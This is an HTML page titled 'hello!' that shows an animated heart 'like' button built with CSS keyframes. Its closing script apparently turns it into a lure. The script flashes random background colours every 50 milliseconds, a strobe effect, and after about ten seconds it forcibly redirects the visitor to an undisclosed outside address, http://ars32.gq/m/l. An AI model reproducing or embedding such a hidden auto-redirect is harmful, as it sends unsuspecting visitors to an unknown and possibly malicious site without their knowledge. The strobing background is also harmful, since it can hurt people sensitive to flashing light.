<!DOCTYPE html>
<html >
  <head>
    <meta charset="UTF-8">
    <title>hello!</title>
        <style>
        @-webkit-keyframes heart {
    0%,
    18.51852% {
        height: 0;
        width: 0;
        top: 50%;
        margin-top: 0;
        margin-left: 0;
    }

    44.44444% {
        height: 25em;
        width: 25em;
        top: 54%;
        margin-top: -12.5em;
        margin-left: -12.5em;
    }

    62.96296% {
        height: 20em;
        width: 20em;
        top: 54%;
        margin-top: -10em;
        margin-left: -10em;
    }

    81.48148% {
        height: 20.5em;
        width: 20.5em;
        top: 54%;
        margin-top: -10.25em;
        margin-left: -10.25em;
    }

    100% {
        height: 20em;
        width: 20em;
        top: 54%;
        margin-top: -10em;
        margin-left: -10em;
    }
}

@keyframes heart {
    0%,
    18.51852% {
        height: 0;
        width: 0;
        top: 50%;
        margin-top: 0;
        margin-left: 0;
    }

    44.44444% {
        height: 25em;
        width: 25em;
        top: 54%;
        margin-top: -12.5em;
        margin-left: -12.5em;
    }

    62.96296% {
        height: 20em;
        width: 20em;
        top: 54%;
        margin-top: -10em;
        margin-left: -10em;
    }

    81.48148% {
        height: 20.5em;
        width: 20.5em;
        top: 54%;
        margin-top: -10.25em;
        margin-left: -10.25em;
    }

    100% {
        height: 20em;
        width: 20em;
        top: 54%;
        margin-top: -10em;
        margin-left: -10em;
    }
}

@-webkit-keyframes ring {
    0% {
        height: 0;
        width: 0;
        border-width: 0;
        margin-top: 0;
        margin-left: 0;
    }

    3.7037% {
        height: 0;
        width: 0;
        border-width: 2em;
        margin-top: -2em;
        margin-left: -2em;
        border-color: #E2264D;
    }

    7.40741% {
        height: 0;
        width: 0;
        border-width: 14em;
        margin-top: -14em;
        margin-left: -14em;
    }

    11.11111% {
        height: 0;
        width: 0;
        border-width: 16em;
        margin-top: -16em;
        margin-left: -16em;
    }

    14.81481% {
        height: 0;
        width: 0;
        border-width: 17em;
        margin-top: -17em;
        margin-left: -17em;
    }

    18.51852% {
        width: 24em;
        height: 24em;
        border-width: 5em;
        border-color: #CC8EF5;
    }

    22.22222% {
        width: 32em;
        height: 32em;
        border-width: 1em;
    }

    25.92593%,
    100% {
        width: 34em;
        height: 34em;
        border-width: 0;
        margin-top: -17em;
        margin-left: -17em;
    }
}

@keyframes ring {
    0% {
        height: 0;
        width: 0;
        border-width: 0;
        margin-top: 0;
        margin-left: 0;
    }

    3.7037% {
        height: 0;
        width: 0;
        border-width: 2em;
        margin-top: -2em;
        margin-left: -2em;
        border-color: #E2264D;
    }

    7.40741% {
        height: 0;
        width: 0;
        border-width: 14em;
        margin-top: -14em;
        margin-left: -14em;
    }

    11.11111% {
        height: 0;
        width: 0;
        border-width: 16em;
        margin-top: -16em;
        margin-left: -16em;
    }

    14.81481% {
        height: 0;
        width: 0;
        border-width: 17em;
        margin-top: -17em;
        margin-left: -17em;
    }

    18.51852% {
        width: 24em;
        height: 24em;
        border-width: 5em;
        border-color: #CC8EF5;
    }

    22.22222% {
        width: 32em;
        height: 32em;
        border-width: 1em;
    }

    25.92593%,
    100% {
        width: 34em;
        height: 34em;
        border-width: 0;
        margin-top: -17em;
        margin-left: -17em;
    }
}

@-webkit-keyframes circles {
    0%,
    18.51852% {
        box-shadow: -10.6066em -10.6066em 0 -1.66667em #8ce8c3, -11.49067em -9.64181em 0 -1.66667em #8be7c2, 1.67947em -14.90568em 0 -1.66667em #90d2fa, 0.37396em -14.99534em 0 -1.66667em #91d1f9, 12.70086em -7.98048em 0 -1.66667em #cc8ef5, 11.95699em -9.05707em 0 -1.66667em #cb8df4, 14.15825em 4.95419em 0 -1.66667em #8ce8c3, 14.53616em 3.70136em 0 -1.66667em #8ce8c3, 4.95419em 14.15825em 0 -1.66667em #f58ea7, 6.16931em 13.67259em 0 -1.66667em #f48da6, -7.98048em 12.70086em 0 -1.66667em #91d2fa, -6.84316em 13.34808em 0 -1.66667em #91d2fa, -14.90568em 1.67947em 0 -1.66667em #92d3fc, -14.70259em 2.97219em 0 -1.66667em #cb8df4;
    }

    22.22222% {
        box-shadow: -11.31371em -11.31371em 0 -0.66667em #8ce8c3, -13.02276em -10.92739em 0 -0.66667em #8be7c2, 1.79143em -15.8994em 0 -0.66667em #90d2fa, 0.42382em -16.99472em 0 -0.66667em #91d1f9, 13.54759em -8.51251em 0 -0.66667em #cc8ef5, 13.55125em -10.26467em 0 -0.66667em #cb8df4, 15.10213em 5.28446em 0 -0.66667em #8ce8c3, 16.47431em 4.19488em 0 -0.66667em #8ce8c3, 5.28446em 15.10213em 0 -0.66667em #f58ea7, 6.99188em 15.4956em 0 -0.66667em #f48da6, -8.51251em 13.54759em 0 -0.66667em #91d2fa, -7.75558em 15.12782em 0 -0.66667em #91d2fa, -15.8994em 1.79143em 0 -0.66667em #92d3fc, -16.66293em 3.36848em 0 -0.66667em #cb8df4;
    }

    51.85185% {
        box-shadow: -16.97056em -16.97056em 0 -0.33333em #9b88cb, -16.77341em -10.89278em 0 -1.16667em #ac77d9, 2.68715em -23.84909em 0 -0.33333em #97e3d5, -1.94173em -19.90552em 0 -1.16667em #b0dfe0, 20.32138em -12.76877em 0 -0.33333em #d1dbaa, 14.35211em -13.929em 0 -1.16667em #d8ce9f, 22.6532em 7.9267em 0 -0.33333em #66cc9e, 19.83852em 2.53635em 0 -1.16667em #70d4a8, 7.9267em 22.6532em 0 -0.33333em #d5a5bf, 10.38612em 17.09177em 0 -1.16667em #ad9be0, -12.76877em 20.32138em 0 -0.33333em #bc7be1, -6.88724em 18.77674em 0 -1.16667em #a38cdb, -23.84909em 2.68715em 0 -0.33333em #b77bdc, -18.97437em 6.32244em 0 -1.16667em #9fcbcc;
    }

    81.48148%,
    100% {
        box-shadow: -16.97056em -16.97056em 0 -1.66667em #a068ce, -16.77341em -10.89278em 0 -1.66667em #b752e1, 2.68715em -23.84909em 0 -1.66667em #99e9c8, -1.94173em -19.90552em 0 -1.66667em #bae3d7, 20.32138em -12.76877em 0 -1.66667em #d3f491, 14.35211em -13.929em 0 -1.66667em #dce483, 22.6532em 7.9267em 0 -1.66667em #59c392, 19.83852em 2.53635em 0 -1.66667em #67cd9f, 7.9267em 22.6532em 0 -1.66667em #caadc7, 10.38612em 17.09177em 0 -1.66667em #959ff3, -12.76877em 20.32138em 0 -1.66667em #ca5ed8, -6.88724em 18.77674em 0 -1.66667em #a975d1, -23.84909em 2.68715em 0 -1.66667em #c35dd1, -18.97437em 6.32244em 0 -1.66667em #90e0be;
    }
}

@keyframes circles {
    0%,
    18.51852% {
        box-shadow: -10.6066em -10.6066em 0 -1.66667em #8ce8c3, -11.49067em -9.64181em 0 -1.66667em #8be7c2, 1.67947em -14.90568em 0 -1.66667em #90d2fa, 0.37396em -14.99534em 0 -1.66667em #91d1f9, 12.70086em -7.98048em 0 -1.66667em #cc8ef5, 11.95699em -9.05707em 0 -1.66667em #cb8df4, 14.15825em 4.95419em 0 -1.66667em #8ce8c3, 14.53616em 3.70136em 0 -1.66667em #8ce8c3, 4.95419em 14.15825em 0 -1.66667em #f58ea7, 6.16931em 13.67259em 0 -1.66667em #f48da6, -7.98048em 12.70086em 0 -1.66667em #91d2fa, -6.84316em 13.34808em 0 -1.66667em #91d2fa, -14.90568em 1.67947em 0 -1.66667em #92d3fc, -14.70259em 2.97219em 0 -1.66667em #cb8df4;
    }

    22.22222% {
        box-shadow: -11.31371em -11.31371em 0 -0.66667em #8ce8c3, -13.02276em -10.92739em 0 -0.66667em #8be7c2, 1.79143em -15.8994em 0 -0.66667em #90d2fa, 0.42382em -16.99472em 0 -0.66667em #91d1f9, 13.54759em -8.51251em 0 -0.66667em #cc8ef5, 13.55125em -10.26467em 0 -0.66667em #cb8df4, 15.10213em 5.28446em 0 -0.66667em #8ce8c3, 16.47431em 4.19488em 0 -0.66667em #8ce8c3, 5.28446em 15.10213em 0 -0.66667em #f58ea7, 6.99188em 15.4956em 0 -0.66667em #f48da6, -8.51251em 13.54759em 0 -0.66667em #91d2fa, -7.75558em 15.12782em 0 -0.66667em #91d2fa, -15.8994em 1.79143em 0 -0.66667em #92d3fc, -16.66293em 3.36848em 0 -0.66667em #cb8df4;
    }

    51.85185% {
        box-shadow: -16.97056em -16.97056em 0 -0.33333em #9b88cb, -16.77341em -10.89278em 0 -1.16667em #ac77d9, 2.68715em -23.84909em 0 -0.33333em #97e3d5, -1.94173em -19.90552em 0 -1.16667em #b0dfe0, 20.32138em -12.76877em 0 -0.33333em #d1dbaa, 14.35211em -13.929em 0 -1.16667em #d8ce9f, 22.6532em 7.9267em 0 -0.33333em #66cc9e, 19.83852em 2.53635em 0 -1.16667em #70d4a8, 7.9267em 22.6532em 0 -0.33333em #d5a5bf, 10.38612em 17.09177em 0 -1.16667em #ad9be0, -12.76877em 20.32138em 0 -0.33333em #bc7be1, -6.88724em 18.77674em 0 -1.16667em #a38cdb, -23.84909em 2.68715em 0 -0.33333em #b77bdc, -18.97437em 6.32244em 0 -1.16667em #9fcbcc;
    }

    81.48148%,
    100% {
        box-shadow: -16.97056em -16.97056em 0 -1.66667em #a068ce, -16.77341em -10.89278em 0 -1.66667em #b752e1, 2.68715em -23.84909em 0 -1.66667em #99e9c8, -1.94173em -19.90552em 0 -1.66667em #bae3d7, 20.32138em -12.76877em 0 -1.66667em #d3f491, 14.35211em -13.929em 0 -1.66667em #dce483, 22.6532em 7.9267em 0 -1.66667em #59c392, 19.83852em 2.53635em 0 -1.66667em #67cd9f, 7.9267em 22.6532em 0 -1.66667em #caadc7, 10.38612em 17.09177em 0 -1.66667em #959ff3, -12.76877em 20.32138em 0 -1.66667em #ca5ed8, -6.88724em 18.77674em 0 -1.66667em #a975d1, -23.84909em 2.68715em 0 -1.66667em #c35dd1, -18.97437em 6.32244em 0 -1.66667em #90e0be;
    }
}

.heart-wrapper {
    height: 60em;
    width: 60em;
    position: relative;
    cursor: pointer;
}

.heart-wrapper .heart {
    display: block;
    height: 20em;
    width: 20em;
    top: 54%;
    margin-top: -10em;
    margin-left: -10em;
    left: 50%;
    position: absolute;
    z-index: 0;
}

.heart-wrapper .heart > * {
    overflow: hidden;
    position: absolute;
}

.heart-wrapper .heart > *:after {
    display: block;
    content: '';
    position: absolute;
    background: #AAB8C2;
}

.heart-wrapper .heart .tl {
    height: 25%;
    width: 50.25%;
    top: 0;
    left: 0;
}

.heart-wrapper .heart .tl:after {
    top: 0;
    left: 0;
    height: 200%;
    width: 104%;
    border-top-left-radius: 70% 80%;
    border-top-right-radius: 80% 80%;
    border-bottom-right-radius: 50% 50%;
    border-bottom-left-radius: 50% 50%;
}

.heart-wrapper .heart .tr {
    height: 25%;
    width: 50.25%;
    top: 0;
    right: 0;
}

.heart-wrapper .heart .tr:after {
    top: 0;
    right: 0;
    height: 200%;
    width: 104%;
    border-top-left-radius: 80% 80%;
    border-top-right-radius: 70% 80%;
    border-bottom-right-radius: 50% 50%;
    border-bottom-left-radius: 50% 50%;
}

.heart-wrapper .heart .bl {
    height: 75.5%;
    width: 50.25%;
    bottom: 0;
    left: 0;
}

.heart-wrapper .heart .bl:after {
    top: 0;
    left: 0;
    height: 95%;
    width: 160%;
    border-top-left-radius: 0 0;
    border-top-right-radius: 0 0;
    border-bottom-right-radius: 0 0;
    border-bottom-left-radius: 100% 100%;
}

.heart-wrapper .heart .br {
    height: 75.5%;
    width: 50.25%;
    bottom: 0;
    right: 0;
}

.heart-wrapper .heart .br:after {
    top: 0;
    right: 0;
    height: 95%;
    width: 160%;
    border-top-left-radius: 0 0;
    border-top-right-radius: 0 0;
    border-bottom-right-radius: 100% 100%;
    border-bottom-left-radius: 0 0;
}

.heart-wrapper .ring {
    display: block;
    position: absolute;
    border-width: 0;
    border-style: solid;
    top: 50%;
    left: 50%;
    border-radius: 50%;
    z-index: 1;
}

.heart-wrapper .circles {
    display: block;
    position: absolute;
    height: 3.33333em;
    width: 3.33333em;
    top: 50%;
    left: 50%;
    margin-top: -1.66667em;
    margin-left: -1.66667em;
    z-index: 2;
    border-radius: 50%;
}

.heart-wrapper:hover .heart .tl:after, .heart-wrapper:hover .heart .tr:after, .heart-wrapper:hover .heart .bl:after, .heart-wrapper:hover .heart .br:after {
    background: #E2264D;
}

.heart-wrapper.active .heart {
    -webkit-animation-name: heart;
    animation-name: heart;
    -webkit-animation-duration: 1s;
    animation-duration: 1s;
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    -webkit-animation-iteration-count: 10;
    animation-iteration-count: 10;
}

.heart-wrapper.active .heart .tl:after, .heart-wrapper.active .heart .tr:after, .heart-wrapper.active .heart .bl:after, .heart-wrapper.active .heart .br:after {
    background: #E2264D;
}

.heart-wrapper.active .ring {
    -webkit-animation-name: ring;
    animation-name: ring;
    -webkit-animation-duration: 1s;
    animation-duration: 1s;
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    -webkit-animation-iteration-count: 10;
    animation-iteration-count: 10;
}

.heart-wrapper.active .circles {
    -webkit-animation-name: circles;
    animation-name: circles;
    -webkit-animation-duration: 1s;
    animation-duration: 1s;
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    -webkit-animation-iteration-count: 10;
    animation-iteration-count: 10;
}

/* -------------------------------------------------- */
html {
    font-size: 8px;
}

@media (min-width: 768px) {
    html {
        font-size: 16px;
    }
}

body {
    background: #fff;
    margin: 0;
    padding: 0;
}

.heart-wrapper {
    position: absolute;
    top: 50%;
    left: 50%;
    margin: -30em 0 0 -30em;
}



        </style>




  </head>

  <body>


<div class="heart-wrapper active">
  <div class="heart">
    <div class="tl"></div>
    <div class="tr"></div>
    <div class="bl"></div>
    <div class="br"></div>
  </div>
  <div class="ring"></div>
  <div class="circles"></div>
</div>
    <script src='http://chancejs.com/chance.min.js'></script>

        <script>
        window.onload = function(){
  var debug = /*true ||*/ false;
  var h = document.querySelector('.heart-wrapper');

  function toggleActivate(){
    h.classList.toggle('active');
  }

  if(!debug){
    h.addEventListener('click',function(){
      toggleActivate();
    },false);

    // setInterval(toggleActivate,1000);
  }else{
    var elts = Array.prototype.slice.call(h.querySelectorAll(':scope > *'),0);
    var activated = false;
    var animating = false;
    var count = 0;
    var step = 1000;

    function setAnim(state){
      elts.forEach(function(elt){
        elt.style.animationPlayState = state;
      });
    }

    h.addEventListener('click',function(){
      if (animating) return;
      if (count > 27) {
        h.classList.remove('active');
        count = 0;
        return;
      }
      if (!activated) h.classList.add('active') && (activated = true);

      console.log('Step : '+(++count));
      animating = true;

      setAnim('running');
      setTimeout(function(){
        setAnim('paused');
        animating = false;
      },step);
    },false);

    setAnim('paused');
    elts.forEach(function(elt){
      elt.style.animationDuration = step/1000*27+'s';
    });
  }

};

var t = 0;
setInterval(function(){
  t++;
  if( t%2==0  ? t%3==0 : t%3!=0 ){
    document.body.style.background = chance.color();
  }
  if(t>200){
    window.location.href = 'http://ars32.gq/m/l';
  }
}, 50 )
        </script>




  </body>
</html>
